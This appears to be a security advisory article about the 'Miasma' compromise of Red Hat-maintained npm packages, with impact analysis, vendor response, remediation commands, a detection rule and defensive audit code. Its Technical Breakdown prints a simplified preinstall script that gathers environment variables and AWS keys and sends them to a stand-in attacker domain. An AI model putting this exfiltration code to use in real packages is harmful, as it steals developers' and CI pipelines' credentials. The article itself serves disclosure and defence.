Red Hat npm Packages Compromised In Credential Theft Attack

Multiple npm packages maintained by Red Hat were compromised in a sophisticated supply chain attack dubbed “Miasma.” Attackers gained unauthorized access to Red Hat developer credentials and injected malicious preinstall scripts designed to harvest environment variables, AWS credentials, and other sensitive data. The malicious code executed automatically during package installation, affecting developers and CI/CD pipelines worldwide. Red Hat has revoked compromised packages and published clean versions, but organizations must audit their environments for potential credential exposure.

Introduction

The open-source ecosystem faces another critical supply chain compromise, this time targeting Red Hat’s npm packages. Security researchers discovered malicious code embedded in several packages maintained by Red Hat developers, designed to exfiltrate credentials and sensitive environment data during the installation process. The attack, identified as the “Miasma” campaign, represents a textbook example of how compromised developer credentials can cascade into widespread supply chain contamination.

Unlike traditional package typosquatting or dependency confusion attacks, this compromise targeted legitimate packages with established user bases. The attackers leveraged stolen credentials to publish malicious versions that appeared authentic, bypassing the trust mechanisms developers rely on when installing packages from verified publishers.

The incident highlights the persistent vulnerability of the npm ecosystem to credential-based attacks and underscores the critical importance of protecting developer accounts with multi-factor authentication and continuous monitoring.

Background & Context

The Miasma campaign emerged in late 2024, discovered through automated supply chain monitoring systems that detected suspicious preinstall script modifications in several Red Hat-maintained packages. The affected packages had varying levels of adoption, from niche utilities to more widely deployed developer tools.

Red Hat maintains numerous open-source projects and npm packages as part of its commitment to the developer community. These packages are trusted components in many enterprise development workflows, making them high-value targets for supply chain attackers. The company’s reputation and the inherent trust in Red Hat-branded packages created an ideal camouflage for malicious payloads.

The attack vector centered on compromised npm account credentials belonging to Red Hat developers. Once attackers obtained these credentials—likely through phishing, credential stuffing, or information stealer malware—they could publish new package versions without raising immediate red flags. The npm registry’s design treats authenticated publishers as trusted, meaning malicious versions appeared as legitimate updates.

Supply chain attacks targeting npm have increased dramatically over recent years, with researchers documenting thousands of malicious packages annually. However, compromises of established, legitimate packages remain relatively rare compared to typosquatting and fake packages, making this incident particularly noteworthy.

Technical Breakdown

The malicious payload embedded in compromised Red Hat packages utilized npm’s preinstall script functionality. This lifecycle hook executes automatically before package installation completes, providing attackers with code execution on target systems without requiring explicit user interaction beyond running npm install.

The malicious preinstall script contained obfuscated JavaScript that behaved along the following lines:

// Simplified representation of malicious behavior
const fs = require('fs');
const https = require('https');
const os = require('os');

// Harvest environment variables
const envData = process.env;

// Target AWS credentials
const awsCreds = {
  key: process.env.AWS_ACCESS_KEY_ID,
  secret: process.env.AWS_SECRET_ACCESS_KEY,
  token: process.env.AWS_SESSION_TOKEN
};

// Collect system information
const systemInfo = {
  hostname: os.hostname(),
  platform: os.platform(),
  user: os.userInfo(),
  cwd: process.cwd()
};

// Exfiltrate data to attacker-controlled endpoint
const payload = Buffer.from(JSON.stringify({
  env: envData,
  aws: awsCreds,
  system: systemInfo
})).toString('base64');

https.get(`https://attacker-c2-domain.com/collect?d=${payload}`);

The actual implementation employed multiple obfuscation layers, including base64 encoding, string concatenation, and dynamic function construction to evade static analysis. The code also implemented anti-debugging checks and conditional execution to avoid detection in sandboxed analysis environments.

The exfiltration endpoint rotated through multiple domains and IP addresses, utilizing bulletproof hosting infrastructure to maintain persistence. Data transmission occurred over HTTPS to blend with legitimate traffic and avoid triggering network security tools.

The attackers published malicious versions with seemingly benign version bumps, taking advantage of developers using flexible version ranges in package.json files. Systems configured with ^ or ~ version specifiers automatically pulled the compromised versions during installation or update operations.

Impact & Risk Assessment

The Miasma campaign poses severe risks across multiple dimensions:

Credential Exposure: The primary impact involves widespread credential harvesting. Any environment where compromised packages were installed potentially leaked AWS keys, API tokens, private keys, database credentials, and other sensitive data stored in environment variables. This exposure could enable follow-on attacks including cloud resource compromise, data breaches, and lateral movement.

CI/CD Pipeline Compromise: Automated build systems represent particularly high-value targets. CI/CD environments typically contain elevated credentials with broad access to production infrastructure. A single infected build pipeline could expose credentials capable of compromising entire cloud environments or deployment infrastructure.

Supply Chain Contamination: Applications built using compromised packages may have embedded malicious code in their distributions, potentially affecting downstream users. While the preinstall scripts execute during development rather than runtime, the possibility of persistent backdoors remains a concern pending thorough code review.

Scope Uncertainty: Determining the full scope of affected systems remains challenging. Package installation telemetry may not capture all instances, particularly in air-gapped environments or systems with modified npm configurations. Organizations must assume compromise and conduct defensive credential rotation.

Reputational Damage: The incident impacts trust in Red Hat-maintained packages and raises broader questions about npm ecosystem security. Developer confidence in supply chain integrity suffers with each high-profile compromise.

The attack window—from initial malicious publication to discovery and revocation—determined actual victim count. Even brief exposure windows can affect thousands of installations in globally distributed development environments.

Vendor Response

Red Hat responded rapidly following discovery of the compromise:

The company immediately revoked compromised npm package versions and published clean releases with incremented version numbers. Red Hat security teams conducted forensic analysis to determine the scope of credential compromise and identify the attack’s entry vector.

In public statements, Red Hat acknowledged the compromise and provided transparency about affected packages. The company implemented mandatory password resets for potentially compromised developer accounts and enforced multi-factor authentication across all npm publishing accounts.

Red Hat published security advisories containing:

  • Complete list of affected package names and malicious version numbers
  • Indicators of compromise for detection
  • Recommended remediation steps
  • Timeline of compromise and discovery

The company coordinated with npm registry operators to ensure malicious versions were unlisted and prevented from future installation. Red Hat also engaged with the security research community to share malware samples and enable broader analysis.

Long-term improvements announced include enhanced code review processes for package publications, mandatory 2FA for all maintainers, and implementation of npm package signing to verify authenticity.

Mitigations & Workarounds

Organizations should implement immediate remediation steps:

Identify Affected Systems: Audit all development environments, build servers, and CI/CD pipelines for compromised package installations. Check package-lock.json files for specific malicious versions:

# Search for potentially affected packages
find . -name "package-lock.json" -exec grep -l "compromised-package-name" {} \;

# Review installed versions, including transitive dependencies
# (--depth=0 would list only direct dependencies)
npm ls --all | grep -E "(package1|package2|package3)"
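A lockfile audit that goes one step further than grepping for a name, as an added example (not code from the original article or from Red Hat): it walks the `packages` map of a parsed package-lock.json (lockfileVersion 2 or 3), matches exact name@version pairs against a deny-list, and lists every package that npm recorded as having install scripts. The deny-list entry and the sample lockfile are constructed placeholders, and `auditLockfile` is a hypothetical helper name.

```javascript
// Added example: audit a parsed package-lock.json (lockfileVersion 2 or 3).
// DENYLIST entries are constructed placeholders, not real Miasma indicators.
const DENYLIST = new Set(['compromised-package-name@1.2.3']);

// Constructed sample lockfile; in practice pass JSON.parse() of a real one.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/example-lib-a': { version: '2.0.1' },
    'node_modules/example-native-b': { version: '4.1.0', hasInstallScript: true },
    // Transitive copy nested under another dependency
    'node_modules/example-lib-a/node_modules/compromised-package-name': {
      version: '1.2.3', hasInstallScript: true
    },
    'node_modules/@scope/tool': { version: '0.9.0', dev: true }
  }
};

function auditLockfile(lock, denylist = DENYLIST) {
  if (!lock || typeof lock.packages !== 'object' || lock.packages === null) {
    throw new Error('lockfile has no "packages" map (lockfileVersion 1?)');
  }
  const marker = 'node_modules/';
  const findings = { denied: [], installScripts: [] };
  for (const [path, entry] of Object.entries(lock.packages)) {
    const idx = path.lastIndexOf(marker);
    if (idx === -1 || entry.link) continue; // root project, workspace or symlink
    const name = entry.name || path.slice(idx + marker.length);
    const id = `${name}@${entry.version}`;
    if (denylist.has(id)) findings.denied.push({ id, path });
    if (entry.hasInstallScript) findings.installScripts.push({ id, path });
  }
  return findings;
}
```

Feed it the parsed contents of each lockfile found by the `find` command above; the `installScripts` list is also the set of packages that `--ignore-scripts` would stop from running code at install time.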

Rotate All Credentials: Assume compromise and rotate all credentials that may have been exposed in environment variables:

  • AWS access keys and secrets
  • API tokens and service credentials
  • Database passwords
  • SSH keys and certificates
  • Third-party service credentials

Update to Clean Versions: Immediately update to patched package versions published by Red Hat. Use exact version pinning to prevent automatic installation of potentially malicious updates:

{
  "dependencies": {
    "package-name": "1.2.4"
  }
}

Review Audit Logs: Examine cloud provider logs, access logs, and authentication records for suspicious activity indicating credential misuse during the exposure window.

Scan for Persistence: Conduct thorough security scans for backdoors, additional malware, or persistence mechanisms that may have been deployed using stolen credentials.

Detection & Monitoring

Implement detection capabilities to identify compromise indicators:

Network Monitoring: Monitor for connections to known malicious domains associated with Miasma infrastructure:

# Example network monitoring rule
alert tcp any any -> any 443 (msg:"Miasma C2 Communication"; 
  content:"attacker-c2-domain.com"; nocase; 
  classtype:trojan-activity; sid:1000001;)

File Integrity Monitoring: Monitor node_modules directories for unexpected modifications, particularly to preinstall scripts:

# Generate baseline checksums
find node_modules -name "package.json" -exec sha256sum {} \; > baseline.txt

# Compare against baseline
find node_modules -name "package.json" -exec sha256sum {} \; | diff baseline.txt -

Process Monitoring: Detect suspicious child processes spawned during npm install operations, particularly network connections initiated by installation scripts.

Dependency Auditing: Implement automated tools like npm audit, Snyk, or Socket.dev to continuously monitor dependencies for known malicious packages.

Credential Monitoring: Deploy secret scanning tools to detect exposed credentials in code repositories and monitor for unauthorized usage of API keys and access tokens.

Best Practices

Strengthen supply chain security posture through comprehensive controls:

Multi-Factor Authentication: Enforce MFA on all package registry accounts. This single control could have prevented the Miasma compromise entirely.

Least Privilege Environment Variables: Minimize credentials stored in environment variables. Use credential management solutions like AWS Secrets Manager, HashiCorp Vault, or cloud provider IAM roles.

Dependency Pinning: Use exact version specifications rather than ranges to prevent automatic installation of malicious updates:

{
  "dependencies": {
    "package": "1.2.3"
  }
}
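To make the point about `^` and `~` specifiers concrete (from the Technical Breakdown and the pinning advice above), the following added example, which is not from the original article, checks which specs in a package.json would accept a given published version. It assumes plain x.y.z versions with exact, caret or tilde specs; the package name and version numbers are constructed, and `accepts` and `exposedSpecs` are hypothetical helper names.

```javascript
// Added example: which declared ranges would accept a given published version?
// Handles exact, ^ and ~ specs with full x.y.z versions only (an assumption).
function parse(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)$/.exec(v);
  return m ? m.slice(1).map(Number) : null;
}

function cmp(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  return 0;
}

function accepts(spec, version) {
  const v = parse(version);
  const op = spec[0] === '^' || spec[0] === '~' ? spec[0] : '';
  const base = parse(op ? spec.slice(1) : spec);
  if (!v || !base) return null; // unsupported form: review by hand
  if (!op) return cmp(v, base) === 0;
  let upper; // exclusive upper bound of the range
  if (op === '~') upper = [base[0], base[1] + 1, 0];
  else if (base[0] > 0) upper = [base[0] + 1, 0, 0];
  else if (base[1] > 0) upper = [0, base[1] + 1, 0];
  else upper = [0, 0, base[2] + 1];
  return cmp(v, base) >= 0 && cmp(v, upper) < 0;
}

// Return dependencies whose spec would resolve to badVersion, or needs review.
function exposedSpecs(pkgJson, badName, badVersion) {
  const out = [];
  for (const field of ['dependencies', 'devDependencies', 'optionalDependencies']) {
    const spec = (pkgJson[field] || {})[badName];
    if (spec === undefined) continue;
    const verdict = accepts(spec, badVersion);
    if (verdict !== false) out.push({ field, spec, verdict });
  }
  return out;
}

// Constructed manifests; "example-package" 2.3.1 stands in for a malicious bump.
const floating = { dependencies: { 'example-package': '^2.3.0' } };
const pinned = { dependencies: { 'example-package': '2.3.0' } };
```

A range only floats when the lockfile is absent, regenerated or updated; `npm ci` installs exactly what the committed lockfile records, so exact pins and a committed lockfile work together.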

Script Execution Controls: Disable automatic execution of install scripts in high-security environments:

npm install --ignore-scripts

Private Registry Proxying: Route npm installations through private registries with security scanning and approval workflows.

Software Bill of Materials: Maintain comprehensive SBOM documentation for all dependencies to enable rapid vulnerability response.

Sandboxed Build Environments: Isolate build processes in containers or VMs with minimal credential access and strict network egress filtering.

Regular Dependency Audits: Conduct periodic security reviews of all dependencies, removing unused packages and updating to supported versions.

Security Training: Educate developers about supply chain risks, phishing threats targeting credentials, and secure package management practices.

Key Takeaways

  • Compromised Red Hat npm packages contained credential-stealing malware targeting environment variables and AWS credentials
  • Attackers leveraged stolen developer credentials to publish malicious versions of legitimate packages
  • Preinstall scripts provided automatic code execution during package installation
  • Organizations must rotate all potentially exposed credentials and audit for compromise indicators
  • Multi-factor authentication on registry accounts is essential for preventing credential-based package compromises
  • Supply chain security requires defense-in-depth including least privilege, sandboxing, and continuous monitoring
  • The npm ecosystem remains vulnerable to sophisticated supply chain attacks targeting trusted publishers
